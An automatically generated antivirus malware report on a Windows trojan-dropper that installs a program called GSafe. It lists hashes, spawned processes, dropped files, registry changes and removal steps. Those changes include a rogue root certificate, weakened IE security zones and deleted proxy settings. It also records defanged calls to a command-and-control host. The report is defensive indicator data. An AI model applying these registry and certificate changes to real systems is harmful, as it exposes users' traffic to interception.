Gen:Variant.Kazy.652713 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, TrojanDropperVtimrun.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Banker, Trojan, Installer, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 3793ac769333e954caa3150ef331d55b
SHA1: 0c398778a0a48c948cb58d4ceb78b9783ab53519
SHA256: 910e18b8cf0f34d95c585eecf624dcb37e76fe1a15cdfafb15282e87b58c1f9e
SSDeep: 98304:040BSYmFUJejmVl72TfSaNhcsJx02haJnTuGIW2RrZ:040kTFhjkafdNhZJx2nTuc2v
Size: 3505152 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-07-14 02:42:43
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
net1.exe:612
%original file name%.exe:220
nfregdrv.exe:2036
net.exe:1532
Autoplay.exe:1064
setup.exe:1408
GLa55mjk.tmp:1920
GSafe.exe:256
544d21DI.tmp:1300
The Trojan injects its code into the following process(es):
setup.tmp:632
GSafe.exe:1160
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\Autoplay.exe (6040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\setup.exe (54827 bytes)
The process Autoplay.exe:1064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\GLa55mjk.tmp (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\544d21DI.tmp (20506 bytes)
The process setup.tmp:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\wintb.dll (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\ISDone.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\VclStylesInno.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\bp.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\BASS.dll (601 bytes)
The process setup.exe:1408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-TGEJV.tmp\setup.tmp (7972 bytes)
The process GLa55mjk.tmp:1920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\K7FDRZKR.tmp (194 bytes)
The process GSafe.exe:1160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\GS_RuleList.txt (154 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\gw10_rules[1].htm (154 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate Certificate 2.cer (804 bytes)
%WinDir%\Temp\GSafe\SSL\cert.db (2 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\GS_RuleList.txt (0 bytes)
The process 544d21DI.tmp:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (104507 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (38495 bytes)
%Program Files%\GSafe\uninst.exe (313 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\ssleay32.dll (12536 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Program Files%\GSafe\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\SelfDel.dll (5 bytes)
%Program Files%\GSafe\libeay32.dll (41192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\gsafessl.cer (804 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)
The Trojan deletes the following file(s):
%Program Files%\GSafe\gfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1.tmp (0 bytes)
Registry activity
The process net1.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 CE 12 CE 74 A7 A4 A3 6B 93 2C 6D 8E 1D E3 C0"
The process %original file name%.exe:220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 4B A3 CD 3C 1C 82 42 E1 31 F4 33 6E A9 D1 C3"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The process nfregdrv.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 38 B8 AF B5 6D 1B 30 C2 4C 46 FA 57 22 7F 3A"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process net.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC E4 10 EE D1 3A D2 7E 8E 36 9E 4F FD 9E 8B 0A"
The process Autoplay.exe:1064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 9B 78 63 1C 28 2D F0 59 AC C4 1F C2 24 1A C0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup.tmp:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 56 F3 95 C2 23 F5 0F 46 3B AE 04 24 57 BD 2E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process setup.exe:1408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 62 A4 C5 B0 BE 6B 5E 92 A2 F8 5D 03 F4 DB 18"
The process GLa55mjk.tmp:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 5D F1 42 38 02 E6 D3 9F 0C 53 94 B9 36 00 CD"
The process GSafe.exe:1160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\GSafe]
"instid" = "sP5LjBsSTDSAYNaMgbvjYp5jF6vvLgpG"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\gfilterdrv]
"Tag" = "10"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "09 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 C5 11 B1 9C 98 B9 33 36 F0 C7 8C 33 36 B7 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C16CB1EBFB3B7A23CEC8E8D173264CA581BDB66C]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 C1 6C B1 EB"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"C16CB1EBFB3B7A23CEC8E8D173264CA581BDB66C"
The process GSafe.exe:256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 BF 86 AE F1 83 3A 24 93 DB 4D 08 A1 31 56 C1"
The process 544d21DI.tmp:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 96 C1 14 3A 30 3D BB AC FF 11 E1 CF 8E 89 2A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GSafe]
"affid" = "gw10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Comments" = "Browse safe, securely and do your best searches online (BuildID: OlBzPQEfIyB9430Bn248FKivzm)"
"UninstallString" = "%Program Files%\GSafe\uninst.exe /S"
"DisplayVersion" = "2.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayName" = "GSafe"
"QuietUninstallString" = "%Program Files%\GSafe\uninst.exe /S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Publisher" = "GENCO LABS"
[HKLM\SOFTWARE\GSafe]
"Version" = "2.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
2d84b49d88983d3204cf5c9d064b4d54 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GLa55mjk.tmp |
1c76d7defa116a328f47036b54126e6c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\import_root_cert.exe |
a253cbbfbceee37dd90b999d26542038 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\certutil.exe |
0847bc96e23565dbae072ca335a212c9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll |
32b2685234074047263d4a0cc8bf5d56 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll |
09cacf1074663b90a88c2345f42425ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\nss3.dll |
1cce55587f95d57759e36f387c4f9dee | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\plc4.dll |
9b31fe86fac03999982dccbe2a0103ac | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\plds4.dll |
031a02aadf62df41f8558a18e5d280a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\smime3.dll |
b2ad88dd7b83b62695b764d1dadfc15d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll |
dd56b203e3fd5614b3b45643a66527c5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\Autoplay.exe |
758e225bbbffba71f11e7d4c31935721 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\setup.exe |
8b70212c0789fdf6d1adfade836dfce4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\K7FDRZKR.tmp |
c0b11a7e60f69241ddcb278722ab962f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-ISB46.tmp\BASS.dll |
dce6d68da86f44ba0cb70fa7718e2e84 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-ISB46.tmp\ISDone.dll |
76254a07e9931a85f712e5180d9e0b33 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-ISB46.tmp\VclStylesInno.dll |
92dc6ef532fbb4a5c3201469a5b5eb63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-ISB46.tmp\_isetup\_shfoldr.dll |
70cd1d226553f3c0546664d76373fe67 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-ISB46.tmp\bp.dll |
39a339e9c9ecc529202508c9c89a9956 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-ISB46.tmp\wintb.dll |
f29fcd2e6055ae0313c2eebc1b3c44a6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-TGEJV.tmp\setup.tmp |
27a174c67226e0999167785fd24d5afd | c:\Program Files\GSafe\GSafe.exe |
77750c12323ee1185a4ab3497a37079e | c:\Program Files\GSafe\ProtocolFilters.dll |
64aab859fc61768e2d3a21043b250a1b | c:\Program Files\GSafe\libeay32.dll |
452aec2b91f7b9246be4dd27ead67e54 | c:\Program Files\GSafe\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files\GSafe\nfregdrv.exe |
73c940e515d0de29286aec1435297cca | c:\Program Files\GSafe\ssleay32.dll |
d53a914ec858ed47a6aa819a51c29b81 | c:\Program Files\GSafe\uninst.exe |
ada6fbb74c8af93c0fb55ba7c46ad6fb | c:\WINDOWS\system32\drivers\gfilterdrv.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net1.exe:612
%original file name%.exe:220
nfregdrv.exe:2036
net.exe:1532
Autoplay.exe:1064
setup.exe:1408
GLa55mjk.tmp:1920
GSafe.exe:256
544d21DI.tmp:1300 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\Autoplay.exe (6040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\setup.exe (54827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLa55mjk.tmp (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\544d21DI.tmp (20506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\wintb.dll (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\ISDone.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\VclStylesInno.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\bp.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ISB46.tmp\BASS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-TGEJV.tmp\setup.tmp (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\K7FDRZKR.tmp (194 bytes)
%WinDir%\Temp\GS_RuleList.txt (154 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\gw10_rules[1].htm (154 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate Certificate 2.cer (804 bytes)
%WinDir%\Temp\GSafe\SSL\cert.db (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (104507 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (38495 bytes)
%Program Files%\GSafe\uninst.exe (313 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\ssleay32.dll (12536 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Program Files%\GSafe\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\SelfDel.dll (5 bytes)
%Program Files%\GSafe\libeay32.dll (41192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\gsafessl.cer (804 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 43748 | 44032 | 4.53606 | 3aeb6fb8fe8ab95f2462e3afb8b8acd3 |
.data | 49152 | 8796 | 1536 | 4.57321 | f3764284f4d25ed35f75b9c16e1ab608 |
.rsrc | 61440 | 3454936 | 3454976 | 5.5379 | c8ff03aff2b2ed4a752cd020d8ae097a |
.reloc | 3518464 | 3480 | 3584 | 3.33168 | bc74eb2a181cf1029262828db6ac5b5d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://cgd7cak.rlkwg.net/img/seperator?id=12002&action=2&run=1 | 46.4.76.250 |
hxxp://cgd7cak.rlkwg.net/img/seperator?id=12002&action=2&run=2 | 46.4.76.250 |
hxxp://cgd7cak.rlkwg.net/img/seperator?id=12002&action=2&run=3 | 46.4.76.250 |
hxxp://CgD7cAK.rlkwg.net/img/seperator?id=12002&action=2&run=2 | |
hxxp://CgD7cAK.rlkwg.net/img/seperator?id=12002&action=2&run=3 | |
hxxp://CgD7cAK.rlkwg.net/img/seperator?id=12002&action=2&run=1 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/seperator?id=12002&action=2&run=1 HTTP/1.1
Host: CgD7cAK.rlkwg.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2015 14:02:35 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Location: seperator.php
Vary: negotiate
TCN: choice
